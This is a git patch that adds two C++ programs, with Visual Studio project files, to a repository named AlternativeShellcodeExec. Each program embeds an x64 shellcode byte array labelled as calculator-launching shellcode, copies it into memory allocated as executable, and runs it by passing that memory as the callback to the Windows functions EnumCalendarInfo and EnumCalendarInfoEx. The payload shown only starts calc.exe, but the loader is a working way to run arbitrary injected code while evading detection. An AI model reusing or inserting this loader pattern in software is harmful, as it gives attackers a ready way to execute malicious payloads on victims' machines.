From fa503fd97646291c899d05863b7806970b9e01b6 Mon Sep 17 00:00:00 2001 From: Dani Kamanovsky Date: Sun, 16 Oct 2022 00:01:41 +0300 Subject: [PATCH] Adding EnumCalendarInfo & EnumCalendarInfoEx functions --- AlternativeShellcodeExec.sln | 20 +++ EnumCalendarInfo/EnumCalendarInfo.cpp | 30 ++++ EnumCalendarInfo/EnumCalendarInfo.vcxproj | 147 ++++++++++++++++++ EnumCalendarInfoEx/EnumCalendarInfoEx.cpp | 30 ++++ EnumCalendarInfoEx/EnumCalendarInfoEx.vcxproj | 147 ++++++++++++++++++ 5 files changed, 374 insertions(+) create mode 100644 EnumCalendarInfo/EnumCalendarInfo.cpp create mode 100644 EnumCalendarInfo/EnumCalendarInfo.vcxproj create mode 100644 EnumCalendarInfoEx/EnumCalendarInfoEx.cpp create mode 100644 EnumCalendarInfoEx/EnumCalendarInfoEx.vcxproj diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 84b41c7..0cb9be6 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -89,6 +89,10 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumICMProfiles", "EnumICMP EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumThreadWindows", "EnumThreadWindows\EnumThreadWindows.vcxproj", "{4DC52185-7351-4EFA-A364-65945302F470}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumCalendarInfo", "EnumCalendarInfo\EnumCalendarInfo.vcxproj", "{5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumCalendarInfoEx", "EnumCalendarInfoEx\EnumCalendarInfoEx.vcxproj", "{DE7B0D0A-371D-4401-B2A2-A83E891AB90A}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -441,6 +445,22 @@ Global {4DC52185-7351-4EFA-A364-65945302F470}.Release|x64.Build.0 = Release|x64 {4DC52185-7351-4EFA-A364-65945302F470}.Release|x86.ActiveCfg = Release|Win32 {4DC52185-7351-4EFA-A364-65945302F470}.Release|x86.Build.0 = Release|Win32 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Debug|x64.ActiveCfg = Debug|x64 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Debug|x64.Build.0 = Debug|x64 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Debug|x86.ActiveCfg = Debug|Win32 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Debug|x86.Build.0 = Debug|Win32 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Release|x64.ActiveCfg = Release|x64 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Release|x64.Build.0 = Release|x64 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Release|x86.ActiveCfg = Release|Win32 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Release|x86.Build.0 = Release|Win32 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Debug|x64.ActiveCfg = Debug|x64 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Debug|x64.Build.0 = Debug|x64 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Debug|x86.ActiveCfg = Debug|Win32 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Debug|x86.Build.0 = Debug|Win32 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Release|x64.ActiveCfg = Release|x64 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Release|x64.Build.0 = Release|x64 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Release|x86.ActiveCfg = Release|Win32 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumCalendarInfo/EnumCalendarInfo.cpp b/EnumCalendarInfo/EnumCalendarInfo.cpp new file mode 100644 index 0000000..42b1942 --- /dev/null +++ b/EnumCalendarInfo/EnumCalendarInfo.cpp @@ -0,0 +1,30 @@ +#include + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + +int main() { + LPVOID addr = ::VirtualAlloc(nullptr, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + ::RtlMoveMemory(addr, op, sizeof(op)); + ::EnumCalendarInfo((CALINFO_ENUMPROC)addr, LOCALE_USER_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1); +} \ No newline at end of file diff --git a/EnumCalendarInfo/EnumCalendarInfo.vcxproj b/EnumCalendarInfo/EnumCalendarInfo.vcxproj new file mode 100644 index 0000000..02c3958 --- /dev/null +++ b/EnumCalendarInfo/EnumCalendarInfo.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F} + EnumCalendarInfo + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumCalendarInfoEx/EnumCalendarInfoEx.cpp b/EnumCalendarInfoEx/EnumCalendarInfoEx.cpp new file mode 100644 index 0000000..a004353 --- /dev/null +++ b/EnumCalendarInfoEx/EnumCalendarInfoEx.cpp @@ -0,0 +1,30 @@ +#include + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + +int main() { + LPVOID addr = ::VirtualAlloc(nullptr, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + ::RtlMoveMemory(addr, op, sizeof(op)); + ::EnumCalendarInfoEx((CALINFO_ENUMPROCEX)addr, LOCALE_USER_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1); +} \ No newline at end of file diff --git a/EnumCalendarInfoEx/EnumCalendarInfoEx.vcxproj b/EnumCalendarInfoEx/EnumCalendarInfoEx.vcxproj new file mode 100644 index 0000000..a67cfdf --- /dev/null +++ b/EnumCalendarInfoEx/EnumCalendarInfoEx.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A} + EnumCalendarInfoEx + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file